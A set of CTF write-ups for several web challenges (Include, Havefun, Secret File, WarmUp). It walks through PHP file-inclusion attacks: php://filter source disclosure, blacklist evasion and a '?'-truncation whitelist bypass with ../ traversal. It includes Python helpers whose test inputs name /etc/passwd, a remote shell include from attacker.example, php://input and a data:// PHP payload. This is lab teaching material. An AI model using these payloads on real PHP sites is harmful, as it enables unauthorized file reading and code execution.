[ACTF2020 新生赛]Include
The challenge says it is a file-inclusion problem; clicking TIPS leads to a page that takes a file parameter.
Assume the flag is in flag.php.
To read its source rather than execute it, use the PHP filter wrapper (the standard file-inclusion trick for source disclosure) and build the payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
The response is:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MjA5ZGNmZmMtOTVkNy00NTM5LTg4YmMtZGU4ZjJkMWM4MDQ3fQo=
Base64-decoding it gives the source of flag.php, with the flag in a comment:
flag{209dcffc-95d7-4539-88bc-de8f2d1c8047}
[极客大挑战 2019]Havefun
The page is just a picture with no visible code, so press F12 and inspect the source.
The source reveals a cat parameter: if cat=dog, the page returns Syc{cat_cat_cat_cat}.
So request
?cat=dog
and the flag comes out: flag{5a558739-30b0-4b2c-9257-508f5f7a0494}
[极客大挑战 2019]Secret File
Opening it gives a plain page with no obvious hint, so inspect it with F12.
The source hints at
http://d69343e1-7e99-4108-8556-da4ba3e79eb4.node4.buuoj.cn/Archive_room.php
That page has a button; clicking it shows nothing useful.
Given the hint, the secret is probably in the redirect that the button triggers, so capture the requests with Burp Suite.
The intermediate response contains the secret:
<html>
<!--
secr3t.php
-->
</html>
Open that PHP file:
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);
// the flag is in flag.php
?>
</html>
Try requesting flag.php directly.
It shows a page saying "I'm right here", so that route is closed.
Look at the code: it blacklists ../ (case-sensitive, via strstr) and tp, input and data (case-insensitive, via stristr). That blocks plain path traversal, http:// and https:// remote includes, the php://input wrapper and the data:// wrapper, but php://filter is not on the list.
So use the php://filter wrapper to read the file.
Build the payload:
http://d69343e1-7e99-4108-8556-da4ba3e79eb4.node4.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
The response is a base64 blob; decoding it gives:
$flag = 'flag{e7cb31bd-65b9-42fb-a0f5-87e831710500}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
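The two file-inclusion challenges above (Include and Secret File) rely on the same idea: the php://filter wrapper returns a file's bytes instead of executing them, and the secr3t.php blacklist does not cover it. The following Python is an added example, not code from either writeup: it models the secr3t.php blacklist (strstr is case-sensitive, stristr is not), builds the filter payload, and decodes the base64 the Include challenge returned. The blocked candidate values are constructed for illustration; the only real data is the base64 blob copied from the Include writeup.

```python
# Added example (not from the original writeups): a model of the blacklist
# in secr3t.php, a builder for the php://filter payload both challenges use,
# and a decoder for the base64 the filter returns.
import base64
import re

# From secr3t.php: strstr() is case-sensitive, stristr() is not.
CASE_SENSITIVE_BLOCKLIST = ("../",)
CASE_INSENSITIVE_BLOCKLIST = ("tp", "input", "data")


def secr3t_allows(file: str) -> bool:
    """Return True when secr3t.php would reach include($file)."""
    if any(bad in file for bad in CASE_SENSITIVE_BLOCKLIST):
        return False
    lowered = file.lower()
    return not any(bad in lowered for bad in CASE_INSENSITIVE_BLOCKLIST)


def filter_payload(resource: str, chain: str = "convert.base64-encode") -> str:
    """Build the php://filter read chain that returns a file's bytes
    instead of executing them."""
    return f"php://filter/read={chain}/resource={resource}"


def decode_filter_output(blob: str) -> str:
    """Reverse convert.base64-encode; the filter emits one unbroken blob."""
    return base64.b64decode(blob).decode("utf-8")


FLAG_RE = re.compile(r"flag\{[0-9a-f-]+\}")


def extract_flag(source: str):
    """Pull the first flag{...} token out of recovered source, or None."""
    match = FLAG_RE.search(source)
    return match.group(0) if match else None


def triage(candidates):
    """Map each candidate ?file= value to whether secr3t.php lets it through."""
    return {c: secr3t_allows(c) for c in candidates}


# The blob the Include challenge returned (copied from the writeup above).
INCLUDE_BLOB = ("PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7"
                "MjA5ZGNmZmMtOTVkNy00NTM5LTg4YmMtZGU4ZjJkMWM4MDQ3fQo=")

if __name__ == "__main__":
    # Constructed candidates: each blocked one trips a different blacklist entry.
    for value, ok in triage([
        filter_payload("flag.php"),
        "../../etc/passwd",                    # "../"
        "http://attacker.example/shell.txt",   # "tp" (also kills https)
        "php://input",                         # "input"
        "DATA://text/plain,<?php phpinfo();",  # "data", matched case-insensitively
    ]).items():
        print(f"{'allowed' if ok else 'blocked':7} {value}")
    print(extract_flag(decode_filter_output(INCLUDE_BLOB)))
```

Note that the blacklist is matched against the already URL-decoded value of $_GET['file'], so percent-encoding ../ in the request does not help; what helps is picking a wrapper the list never mentions.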
[HCTF 2018]WarmUp
Pressing F12 at the start reveals source.php; open it:
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Since the code mentions hint.php, look at that first:
flag not here, and flag in ffffllllaaaagggg
So the flag is in a file called ffffllllaaaagggg.
Back to the code:
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
This constrains the file parameter: it must be non-empty, a string, and pass checkFile; otherwise the image is returned.
So let's look at the checkFile function:
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it"; // must be a string
            return false;
        }
        if (in_array($page, $whitelist)) {
            return true; // must be in the whitelist
        }
        $_page = mb_substr( // take the part of $page before the first '?', or all of $page if there is none
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        $_page = urldecode($page);
        $_page = mb_substr( // the same truncation again, after one round of URL decoding
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}
So the whitelist check only sees the part of file before the first '?', while include receives the whole string. Build the payload:
file=hint.php?ffffllllaaaagggg
There is no "you can't see it" message, so the check is bypassed, but no flag is returned either.
Presumably the flag is not under the web root, so add ../ to walk up the directory tree.
Final payload:
http://3086897e-fc5a-45d4-badc-6ecfc37581c3.node4.buuoj.cn/source.php?file=hint.php?../../../../../ffffllllaaaagggg
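To make the bypass concrete, here is an added example (not code from the writeup or the challenge): a Python port of emmm::checkFile together with a lexical model of where include ends up. The web root /var/www/html is an assumption, and so is the path model: it treats the non-existent "hint.php?" as a throwaway directory component that the following ".." segments step over, which is the commonly given explanation for why the payload above reaches a file outside the web root. It also shows the role of the third check: PHP decodes the query string once before $_REQUEST is populated, so a request carrying %253F arrives as %3F and only the urldecode branch turns it into the '?' the truncation needs.

```python
# Added example, not code from the original writeup: a Python port of
# emmm::checkFile from source.php plus a lexical model of the include path.
import posixpath
from urllib.parse import unquote_plus

WHITELIST = {"source": "source.php", "hint": "hint.php"}
WEB_ROOT = "/var/www/html"  # assumed document root for the path model


def _before_question_mark(page: str) -> str:
    # mb_substr($page, 0, mb_strpos($page . '?', '?')):
    # everything before the first '?', or the whole string if there is none.
    return page.split("?", 1)[0]


def check_file(page) -> bool:
    """Port of emmm::checkFile. True means source.php will include $page."""
    if not isinstance(page, str):
        return False
    if page in WHITELIST.values():            # exact whitelist hit
        return True
    if _before_question_mark(page) in WHITELIST.values():
        return True                           # hit after '?' truncation
    decoded = unquote_plus(page)              # urldecode($page)
    if _before_question_mark(decoded) in WHITELIST.values():
        return True                           # hit after decode + truncation
    return False


def include_target(page: str) -> str:
    """Lexical model of `include $page` relative to WEB_ROOT.
    Assumption: 'dir/..' collapses even when 'dir' does not exist, so the
    'hint.php?' component is discarded and each '..' walks up one level."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def explain(page: str) -> dict:
    """Bundle the two views of one ?file= value."""
    return {"allowed": check_file(page), "target": include_target(page)}


if __name__ == "__main__":
    for candidate in (
        "hint.php",
        "hint.php?ffffllllaaaagggg",                   # passes, stays in web root
        "hint.php?../../../../../ffffllllaaaagggg",    # the writeup's final payload
        "hint.php/../../../../../ffffllllaaaagggg",    # no '?', so rejected
        "hint.php%3F../../../../../ffffllllaaaagggg",  # needs the urldecode branch
    ):
        print(f"{candidate:48} {explain(candidate)}")
```

The model also explains the author's first attempt: hint.php?ffffllllaaaagggg passes the check but resolves to a file named "hint.php?ffffllllaaaagggg" inside the web root, which does not exist, so nothing is included.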